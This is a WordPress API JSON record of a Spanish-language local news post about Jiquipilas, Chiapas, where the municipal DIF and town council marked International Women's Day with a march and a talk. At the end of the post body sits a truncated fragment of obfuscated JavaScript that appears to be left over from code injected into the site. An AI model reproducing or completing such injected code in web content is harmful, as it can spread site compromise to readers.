{"id":351,"date":"2022-03-09T02:58:25","date_gmt":"2022-03-09T02:58:25","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=351"},"modified":"2022-03-09T02:58:27","modified_gmt":"2022-03-09T02:58:27","slug":"dif-municipal-y-ayuntamiento-de-jiquipilas-conmemoran-el-dia-internacional-de-la-mujer","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=351","title":{"rendered":"DIF Municipal y Ayuntamiento de Jiquipilas conmemoran el d\u00eda internacional de la mujer."},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"352\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220308-WA0025-1024x682.jpg\" alt=\"\" class=\"wp-image-352\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220308-WA0025-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220308-WA0025-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220308-WA0025-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220308-WA0025-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220308-WA0025.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"517\" data-id=\"353\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220308-WA0024-1024x517.jpg\" alt=\"\" class=\"wp-image-353\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220308-WA0024-1024x517.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220308-WA0024-300x151.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220308-WA0024-768x388.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220308-WA0024.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u2022 Unir voces y transmitir el mensaje de la igualdad de g\u00e9nero y respeto hacia las mujeres.<br>\u2022 Como parte de la conmemoraci\u00f3n se imparti\u00f3 la pl\u00e1tica alusiva al d\u00eda, por la Lic. Yareli del Roc\u00edo Cruz Moreno.<\/p>\n\n\n\n<p>Jiquipilas, Chiapas.- En el marco conmemorativo del d\u00eda de la mujer, hecho marcado y promovido como acci\u00f3n de justicia, lucha, derechos e igualdad, mujeres de Jiquipilas marcharon en las principales calles llevando el mensaje inclusivo y de igualdad, exigiendo respeto, oportunidades y un trato digno.<\/p>\n\n\n\n<p>La suma de voces es muestra de la importancia de este d\u00eda, donde el objetivo es expandir y concientizar el valor \u00fanico e importancia de la mujeres en la sociedad; quienes merecen ser respetadas en sus derechos y equidad.<\/p>\n\n\n\n<p>La Presidenta del DIF se\u00f1al\u00f3 que con el color representativo de la igualdad, Jiquipilas es part\u00edcipe en este d\u00eda de gran importancia, aunque aun no se logra el objetivo completamente pero se tiene un avance positivo, siendo modelo a seguir en futuras etapas administrativas.<\/p>\n\n\n\n<p>El alcalde en su participaci\u00f3n dijo que las mujeres tienen voz y participaci\u00f3n, as\u00ed como las mismas oportunidades, &#8220;creamos la instancia de la mujer que atiende de manera directa a quienes necesitan la atenci\u00f3n, as\u00ed c\u00f3mo gestionar campa\u00f1as sociales que abonen a la concientizaci\u00f3n ciudadana&#8221;, se\u00f1al\u00f3.<\/p>\n\n\n\n<p>El edil Jiquipilteco agradeci\u00f3 el respaldo y apoyo de la contadora Mar\u00eda Mandiola Totoriguena, Secretar\u00eda de la Igualdad del estado de Chiapas.<\/p>\n\n\n\n<p>El Gobierno Municipal de Jiquipilas refrend\u00f3 su compromiso con las mujeres jiquipiltecas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Unir voces y transmitir el mensaje de la igualdad de g\u00e9nero y respeto hacia las mujeres.\u2022 Como parte de la conmemoraci\u00f3n se imparti\u00f3 la pl\u00e1tica alusiva al d\u00eda, por la Lic. Yareli del Roc\u00edo Cruz Moreno. Jiquipilas, Chiapas.- En el marco conmemorativo del d\u00eda de la mujer, hecho marcado y promovido como acci\u00f3n de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":353,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-351","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/351","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=351"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/351\/revisions"}],"predecessor-version":[{"id":354,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/351\/revisions\/354"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/353"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=351"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=351"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=351"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}